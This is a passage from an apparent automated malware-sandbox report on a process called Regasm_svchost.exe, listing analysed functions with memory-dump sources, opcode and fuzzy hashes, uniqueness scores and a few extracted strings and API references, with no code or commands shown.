Instruction Fuzzy Hash: 8BE01234504254CFCB20CF55C844BD9B7B0AB86315F14C1DA945AA73D1C7759EC6DF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D4010 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bafe833b977e53dd8852370d4d83f7ca56ca60c4f0a27292cb85163ceff8887d
Instruction ID: 4c04eb76eaa369fc90b241a9ce9fe8c55386e507e9bdab0d2995b7868eabbd8a
Opcode Fuzzy Hash: bafe833b977e53dd8852370d4d83f7ca56ca60c4f0a27292cb85163ceff8887d
Instruction Fuzzy Hash: 0CE0EC30D04248DFC744EFF8988529DBBB5AB44305F1145A9DA0897351EF305A84DB96

Uniqueness

Uniqueness Score: -1.00%

Function 001D1338 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d585770cafc9095917abc0cc674df873b222a87e27de15da2999d87cef2470fa
Instruction ID: ce2a48254101485258dc0a4231e46ecdda4a13db156b391a653b4376b5a70f56
Opcode Fuzzy Hash: d585770cafc9095917abc0cc674df873b222a87e27de15da2999d87cef2470fa
Instruction Fuzzy Hash: 26E0CD71D08205AFC7159B60CD445DEB7B5EF45351F2145A5D815B7320E7758E80CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001D059C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3bb22445150938295161d184ecdd5a5b31b424185ea45a4e8b73ec10679dc7
Instruction ID: 1e0b947d289ce4e8b6e33c54703f2fbef0cf06c75f36cefe5ebc93198f3c9c20
Opcode Fuzzy Hash: af3bb22445150938295161d184ecdd5a5b31b424185ea45a4e8b73ec10679dc7
Instruction Fuzzy Hash: 1BD05E708493689AC742EBB46C0536DBEB48B01205F1541EED98892292EA304B94EAD6

Uniqueness

Uniqueness Score: -1.00%

Function 001D5A78 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bb7132e9598a493a68d728874f97eac91e3696b66639cd605855a23e8ce23cd
Instruction ID: c40c7199dcb7fa8461cb3a38927ab7be98ac83d0c508e9f48c29c245928b987f
Opcode Fuzzy Hash: 3bb7132e9598a493a68d728874f97eac91e3696b66639cd605855a23e8ce23cd
Instruction Fuzzy Hash: 5CE0C270C09218DBC715DFB4940425CBBF5AB41305F2081EDD40893350DB348A40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001DEDA8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076167832b2ae46cda87093b1365ef57cf8b71e985d0af1a06e7387ad2934910
Instruction ID: 5895c1e2e81f8fc503093afd9dc1f61563d2394e34b4851ee96134a071126f54
Opcode Fuzzy Hash: 076167832b2ae46cda87093b1365ef57cf8b71e985d0af1a06e7387ad2934910
Instruction Fuzzy Hash: DAD0E231809208EBCB41EBE5D804A9ABBB9EB05216F1146BA960997260EF314A549BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A30498 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea94325f738662b48ecea442a3dafe4d05311f4463a6149dc19c31b7d2ded651
Instruction ID: 59aa534b94ae61e2344896592ab050f548428dd07f6ea7df4d7d9e87d83eb510
Opcode Fuzzy Hash: ea94325f738662b48ecea442a3dafe4d05311f4463a6149dc19c31b7d2ded651
Instruction Fuzzy Hash: 83D01735809208EBCB01EBE4C900A9EB7B9EB85304F1046BADB0893211EA314B54DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A30528 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97fbf6b9f35301812ebb8851c9615a751badb89215dabaa3596ceaee54093f2
Instruction ID: 56197fdb93649944e44db1439f8aa8e339c51350d78fb1792d2f77ef6b54a49b
Opcode Fuzzy Hash: a97fbf6b9f35301812ebb8851c9615a751badb89215dabaa3596ceaee54093f2
Instruction Fuzzy Hash: B9D01775809208ABC701EBE8D900A9EB7B9EB45308F1046BAEA08D3211EA314B54DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A30B18 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff22a03e98f49818a6c90068fdc0e84c8aa131d2addd6b17a3cc65e08a0f9b8
Instruction ID: e6d549b21935c98c6b11fb3b8efa788c9b3f1f847ce00a4330c32843405e9702
Opcode Fuzzy Hash: 4ff22a03e98f49818a6c90068fdc0e84c8aa131d2addd6b17a3cc65e08a0f9b8
Instruction Fuzzy Hash: ACE08C34904208EBCB04DF94D84099CFB74EB84304F20C1AEED4423341C732AE52DBD4

Uniqueness

Uniqueness Score: -1.00%

Function 001D3727 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799430fee32f02742caf35f50f3e865cb70d60c4a3ee1383d7605227f10bcb27
Instruction ID: 50b65c08814c2b7aaee5ae123741b1c5da65687ec4864ef29c8f8a20fa6fa3b3
Opcode Fuzzy Hash: 799430fee32f02742caf35f50f3e865cb70d60c4a3ee1383d7605227f10bcb27
Instruction Fuzzy Hash: A8E0A574905218DFDB14DB65CD48A99F7B2FB88200F6185D6A809A7250C7305A80DF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D5B40 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 674517b3dbb469c95d0f6042ad1db36322a9e816264c92b4bed5cb01eaafd29a
Instruction ID: be1c494b998cfc791b0504166a90ee563d5441802c33df6ffcc5be9ea3874db0
Opcode Fuzzy Hash: 674517b3dbb469c95d0f6042ad1db36322a9e816264c92b4bed5cb01eaafd29a
Instruction Fuzzy Hash: F4D0A7308041089BC745EBB4980425DB7B5AB00209F2001ADC90893350EB305A80C781

Uniqueness

Uniqueness Score: -1.00%

Function 001D11AC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97b195ef36bda2d8d2978114d6fd590abb66469cc705d8c067601ae506dd4f0
Instruction ID: d1ce3ca7d2f4121d302b0184999e60fc1eb8e1fd05cbf1a4efbb0431e4853342
Opcode Fuzzy Hash: a97b195ef36bda2d8d2978114d6fd590abb66469cc705d8c067601ae506dd4f0
Instruction Fuzzy Hash: 5BE0B674D0421ADFCB549BA4CD45AA9FBB1EF48210F21D5D79809B3350DB308AC5DF20

Uniqueness

Uniqueness Score: -1.00%

Function 001D16A3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704747937c3038b1de6944537da9a11cb81ffe15100d94fb0eb1a0d9a839e34d
Instruction ID: fc65cb7a589f0c139fe6f37ff13111c6db9218f6aa62f4fe98d78b636ba25f6f
Opcode Fuzzy Hash: 704747937c3038b1de6944537da9a11cb81ffe15100d94fb0eb1a0d9a839e34d
Instruction Fuzzy Hash: 25D0A7308185499FCB459FA5C5C1595BB71FF45304F4850F3C8265E20BC3289200EF65

Uniqueness

Uniqueness Score: -1.00%

Function 001D1B86 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ffa89ba0e4105d41aa462fad2c538e78c63d873d93e5e2092c5c69c184be00
Instruction ID: 3e4aa72b55a8b9ad20be690eda16967e6e86b0f7ba4ac34e3460f4dfe4b508b6
Opcode Fuzzy Hash: 60ffa89ba0e4105d41aa462fad2c538e78c63d873d93e5e2092c5c69c184be00
Instruction Fuzzy Hash: 0DE04D78E153188FCB28CB61C844699FBB1EF8A344F2089D6A909A3340C3308A80EF41

Uniqueness

Uniqueness Score: -1.00%

Function 00A3159B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf514b6958bed09a0f7f5277577159b40d840199109a39ad1479d3b83ee5beb1
Instruction ID: 7e186e148616135143c2626394831702cd508dc619d876823e8a9191702303f9
Opcode Fuzzy Hash: cf514b6958bed09a0f7f5277577159b40d840199109a39ad1479d3b83ee5beb1
Instruction Fuzzy Hash: 20E0E234801228CFCB50CF50CA88BD8BBB1BB48309F1084EA9049A72A1CB385BCCEF00

Uniqueness

Uniqueness Score: -1.00%

Function 001D6FC0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fa2c2e1365945fbe98a898f524823a3f6bb03bfdd9838b69a46c838d9f7128
Instruction ID: 3e2022ecfc1cfc36954debdf923ec637000e826e289d7a5c472ec9e49a51b59f
Opcode Fuzzy Hash: 25fa2c2e1365945fbe98a898f524823a3f6bb03bfdd9838b69a46c838d9f7128
Instruction Fuzzy Hash: A8C02B3030420C13C30032F8940530E31494385310F404030E20D4BB85CD52EC890396

Uniqueness

Uniqueness Score: -1.00%

Function 001D1707 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05748a716e378c123e61b97c5243ba2862b6a673b9ebee8d7b075c1db792862c
Instruction ID: 2d8b7aa012f72b6c98ced03547c75b90b426ecc9b578ea4b4348bca4a380b388
Opcode Fuzzy Hash: 05748a716e378c123e61b97c5243ba2862b6a673b9ebee8d7b075c1db792862c
Instruction Fuzzy Hash: C8C08C30A222099BC749DF5AD88409DBBB1AB88201F3199A9C007A2124DB309B40CF50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001DEDF0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

.@=l, xrefs: 001DEF51

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: .@=l
API String ID: 0-1071640348
Opcode ID: 267224091aee523bdcf4c6ad7353ce63b773d8c60301568ac9171775a75e55d7
Instruction ID: 9a1abc8a57c5cc700fd24a6f99bb31b46cc19ecacfa37ecc14f389d7b3d2c961
Opcode Fuzzy Hash: 267224091aee523bdcf4c6ad7353ce63b773d8c60301568ac9171775a75e55d7
Instruction Fuzzy Hash: C1612E719062098BD758EF7AD941A8DBBF3BB88304F14C53AD1049B378DBB1690A8F91

Uniqueness

Uniqueness Score: -1.00%

Function 00A411E8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

9, xrefs: 00A412FE

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: d6abe9f8dfcdae255ef83356b736ef853a0089bba7ee14b4f1cc2e59ea61d381
Instruction ID: 07c787c2ba9510c7230561d78bfbf39686f5f8205f43a4cc7f3f8a7a895b5bcb
Opcode Fuzzy Hash: d6abe9f8dfcdae255ef83356b736ef853a0089bba7ee14b4f1cc2e59ea61d381
Instruction Fuzzy Hash: A6413075D016588BEB6CCF6BCD4079EFAF3AFC9301F14C1BA840DA6255DB705A818E50

Uniqueness

Uniqueness Score: -1.00%

Function 00A411D9 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

9, xrefs: 00A412FE

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 70c79235934fc70d18129e12175f873e433a65e9bf91751c84071fe39afe4bbb
Instruction ID: ba145cbdbd13d1e3aac09079ebc941978841da584e88a3d68410e769be875c74
Opcode Fuzzy Hash: 70c79235934fc70d18129e12175f873e433a65e9bf91751c84071fe39afe4bbb
Instruction Fuzzy Hash: 2E412671D01A548BEB5CCF6BCD4069EFAF3BFC5201F14C1BA844CAA255DB7016828F15

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B98 Relevance: .6, Instructions: 642COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408f8f505ccbb050923356de2f22d8b00028d309d2d86270fa067294a612f340
Instruction ID: 4c404037f895fae5aa4d1fab929fb9652752fd6be8c8f664126a3d08f6db0ef9
Opcode Fuzzy Hash: 408f8f505ccbb050923356de2f22d8b00028d309d2d86270fa067294a612f340
Instruction Fuzzy Hash: 8212310D4DE3C15FE312E73428AB9A3BFB09DBE61435985DF8CC04A0A7D441629FA792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Regasm_svchost.exePID: 616, Parent PID: 2884COMMON

Execution Graph

Execution Coverage:	27.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	452
Total number of Limit Nodes:	41

Executed Functions

Function 0062C788 Relevance: 11.6, Strings: 9, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fC=l, xrefs: 0062C944
fC=l, xrefs: 0062C9D1
fC=l, xrefs: 0062CAC3
fC=l, xrefs: 0062CA43
fC=l, xrefs: 0062C98B
03J, xrefs: 0062CAAE
fC=l, xrefs: 0062C9FF
fC=l, xrefs: 0062C900
fC=l, xrefs: 0062CA89

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: 03J$fC=l$fC=l$fC=l$fC=l$fC=l$fC=l$fC=l$fC=l
API String ID: 0-2271297119
Opcode ID: f46fc65f28f7e77c2ca8a2bbee90b5b42aea9bdded8dc1db5d46f3fc34cc6fbd
Instruction ID: 43b7ade4e0bb1c0e1c75e6967a2685e7da351cca137e3d7f2b9ad302808ac679
Opcode Fuzzy Hash: f46fc65f28f7e77c2ca8a2bbee90b5b42aea9bdded8dc1db5d46f3fc34cc6fbd
Instruction Fuzzy Hash: FED1F134B002145BDB24EB74D9557AEB6E3AFC9754F15C838E11AEB780EF34AC418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00624950 Relevance: 8.1, Strings: 6, Instructions: 635
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fC=l, xrefs: 00624C92
fC=l, xrefs: 00624D06
fC=l, xrefs: 00624C20
fC=l, xrefs: 00624B6E
fC=l, xrefs: 00624DE5
fC=l, xrefs: 00624BDB

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l$fC=l$fC=l$fC=l$fC=l$fC=l
API String ID: 0-1979792407
Opcode ID: 5c54d0dd269f9645b536668413a2a3893fcc41ca145cbda44993c7786bbd8659
Instruction ID: 2dbd44d321459013780223f5e10c88eb974bb434d63c0311c8a86c332d89a697
Opcode Fuzzy Hash: 5c54d0dd269f9645b536668413a2a3893fcc41ca145cbda44993c7786bbd8659
Instruction Fuzzy Hash: 2B32DF30B042148FDB15DBA8D994BAEB7F3AFC9304F1A84A5E109EB396DB34DC458B51

Uniqueness

Uniqueness Score: -1.00%

Function 0062D4F8 Relevance: 7.4, Strings: 5, Instructions: 1194COMMON

Download Yara Rule

Strings

fC=l, xrefs: 0062D762
fC=l, xrefs: 0062D6F9
fC=l, xrefs: 0062D654
fC=l, xrefs: 0062D734
fC=l, xrefs: 0062D79D

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l$fC=l$fC=l$fC=l$fC=l
API String ID: 0-3505828565
Opcode ID: 9c58b7592e01156120279993dce2f0c63bd3003cea2d737b596afa29561fe35c
Instruction ID: 5d70bd1190ed31d43126eac92bd9ca91d478368d0185e4bb55c8d0f087076375
Opcode Fuzzy Hash: 9c58b7592e01156120279993dce2f0c63bd3003cea2d737b596afa29561fe35c
Instruction Fuzzy Hash: 7192BD34B046158FDB14EBB8E844BAEB7F3AF85304F148569E409DB396EB34DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00660468 Relevance: 6.6, Strings: 5, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fC=l, xrefs: 00660695
fC=l, xrefs: 0066071F
fC=l, xrefs: 006607C3
fC=l, xrefs: 00660827
fC=l, xrefs: 006606D9

Memory Dump Source

Source File: 00000006.00000002.1173751715.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_660000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l$fC=l$fC=l$fC=l$fC=l
API String ID: 0-3505828565
Opcode ID: 5f9215c2526ea1236de7adffdad96fb1b5187cdc16f59c2dc3c66678f945145d
Instruction ID: d310b0a3e83483813fdc4530465150a0c6aa8617bffccdaec03c92754b7bb412
Opcode Fuzzy Hash: 5f9215c2526ea1236de7adffdad96fb1b5187cdc16f59c2dc3c66678f945145d
Instruction Fuzzy Hash: 8EC1F030B082409FE715DB38C855B6F7BA3AF89304F1584B9E10ADB7A2DB75DC058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0062ACE8 Relevance: 3.3, Strings: 2, Instructions: 760
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fC=l, xrefs: 0062AD5F
fC=l, xrefs: 0062AD90

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l$fC=l
API String ID: 0-2933675378
Opcode ID: 43abc845a6a0db0455b8c7f386744558b043160432a1e6889befbd779d990b48
Instruction ID: 90ba11fbed963e4051f61640bc8b864d9ab52e82aa1fdfad90a3bc2ffdb5dab7
Opcode Fuzzy Hash: 43abc845a6a0db0455b8c7f386744558b043160432a1e6889befbd779d990b48
Instruction Fuzzy Hash: 4E620831E007298FCB64EF78C95469EB7B2AF89314F5086A9D449AB750EF309E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0062E839 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4319bfe9b88de7c256205917f5fc600950b4b7d2903a9c388f9614b588fed632
Instruction ID: c455c47060c82ec9acb809203b9f119cea5b2931b881887cf7878631307290f8
Opcode Fuzzy Hash: 4319bfe9b88de7c256205917f5fc600950b4b7d2903a9c388f9614b588fed632
Instruction Fuzzy Hash: 89F10430B046544FEB2597B8E8947EE77A3EF96300F15847AE10ADB392DB39CC458B52

Uniqueness

Uniqueness Score: -1.00%

Function 00627B98 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807b7a1906274cf2ed2d7aadfb320e36f423ee5e86d8e4348e9686c17286c304
Instruction ID: 5aaf64e185b61f713d41ec46b2da7302ace9e1e047106f85068b4a7acf87a753
Opcode Fuzzy Hash: 807b7a1906274cf2ed2d7aadfb320e36f423ee5e86d8e4348e9686c17286c304
Instruction Fuzzy Hash: 8D02BF34A042259FCB04DFB8D988AADB7B3BF85314F158165D809EB796DB34DC92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0062094A Relevance: 4.2, Strings: 3, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(GJ, xrefs: 00620BA2
|KJ, xrefs: 006209A8
(GJ, xrefs: 00620C2E

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: (GJ$(GJ$|KJ
API String ID: 0-374193224
Opcode ID: 3ddecd3fa315eb4702ae8075e93d850b2241ce1d5e5f5cc2fc80844d4f069959
Instruction ID: c0ab834f986dd259a1080c95ff79c94003187e1bf3e567898d5d52f89a38d92e
Opcode Fuzzy Hash: 3ddecd3fa315eb4702ae8075e93d850b2241ce1d5e5f5cc2fc80844d4f069959
Instruction Fuzzy Hash: F5E1C134B002158FDB15EB74D85879D7BF2AF89304F1185A9D40AEB3A6EF34DD868B90

Uniqueness

Uniqueness Score: -1.00%

Function 003D8FF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 003DC264

Strings

,5J, xrefs: 003D8FF0

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: Open
String ID: ,5J
API String ID: 71445658-4197321902
Opcode ID: 3b8f5c46a8533af507534493d2bdced09e99f0d1daca2f97a2cbefddf2f5f3d4
Instruction ID: 842939f8efde5ca7a11b67472e498af6f817cfea69efae753d9fd2ba1a78fba8
Opcode Fuzzy Hash: 3b8f5c46a8533af507534493d2bdced09e99f0d1daca2f97a2cbefddf2f5f3d4
Instruction Fuzzy Hash: EF3101B1D1424A9FCB10CF99C188A8EFBF5BF49304F25866AE808AB341C7759944CF94

Uniqueness

Uniqueness Score: -1.00%

Function 003D6EE8 Relevance: 3.3, APIs: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D6FB7
KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d6ed7d3da97def7474d779fe0a2ef51ee37773231c5cf9cff83667de1732a817
Instruction ID: 29225842203c5ed3f0e8c084983277c5f2bda718156c078f649b2658927d6896
Opcode Fuzzy Hash: d6ed7d3da97def7474d779fe0a2ef51ee37773231c5cf9cff83667de1732a817
Instruction Fuzzy Hash: AC02EA34905328CFCB66DF24D98D6A9B7B2BF49305F2089EAD40AA6760DB315E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D6F09 Relevance: 3.3, APIs: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D6FB7
KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bec455bd86a3341e2ae2251ba242f502619d659796c155888c1db0d60534ab7e
Instruction ID: 63cbacec6c9630b6b525a30629843ddae7b828a46ca5631b6829959a7c08caf8
Opcode Fuzzy Hash: bec455bd86a3341e2ae2251ba242f502619d659796c155888c1db0d60534ab7e
Instruction Fuzzy Hash: 5B02DB34905328CFCB65DF24D98D6A9B7B1BF49305F2089EAD40AA6760DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D6F4E Relevance: 3.3, APIs: 2, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003D6FB7
KiUserExceptionDispatcher.NTDLL ref: 003D75F9

Memory Dump Source

Source File: 00000006.00000002.1173489901.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d0000_Regasm_svchost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1c193e90b7bb72683442c3742c8caef35aa51ad5dc42bb505f2c9895613c271c
